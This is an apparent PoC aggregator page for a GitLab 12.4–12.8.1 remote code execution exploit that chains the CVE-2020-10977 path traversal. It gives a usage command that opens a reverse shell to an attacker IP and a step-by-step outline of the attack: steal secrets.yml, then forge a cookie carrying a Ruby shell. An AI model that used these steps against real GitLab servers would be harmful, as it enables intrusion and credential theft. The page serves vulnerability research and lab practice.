PoC details: 7cc19a9a5e2b4154cf7a93eff0709de598bc04a5

Source
Associated vulnerability
Title: GitLab path traversal vulnerability (CVE-2020-10977)
Description: GitLab is a self-hosted Git (version control system) repository application developed in Ruby on Rails by the US company GitLab. It can be used to browse a project's file contents, commit history, bug list, and so on. GitLab (Enterprise Edition and Community Edition) versions before 12.9 contain a path traversal vulnerability. The flaw stems from the system failing to properly filter special elements in resource or file paths. An attacker could exploit it to access locations outside the restricted directory.
Description
Gitlab v12.4.0-8.1 RCE
Introduction
### GitLab v12.4.0-12.8.1 RCE
Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me, and the HTML parsing stuff seemed cumbersome, so I rewrote it in JS.

#### Usage
Start a reverse shell handler in the usual way, then run this script with:
```shell
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js
```

A proxy may be specified with `TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"`.
Burp is particularly useful for debugging with this.

#### What this does
1. check whether the target is up
2. if the provided user exists, skip to step 5
3. scan for a username that doesn't already exist
4. create that user
5. attempt to sign in
6. create two empty projects
7. create a new issue ticket with a malicious link in its body in the first project
8. move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads dir
9. fetch the target file; in this case we want `secrets.yml` for the `secret_key_base`
10. use `secret_key_base` to mint an evil cookie with our Ruby shell and pass it to GitLab
File snapshot

[4.0K] /data/pocs/7cc19a9a5e2b4154cf7a93eff0709de598bc04a5
├── [8.8K] gitlab_rce.js
├── [ 550] package.json
├── [104K] package-lock.json
└── [1.2K] README.md

0 directories, 4 files

Cached for you by the Shenlong bot.
Notes
    1. It is recommended to access the PoC via the source link first.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.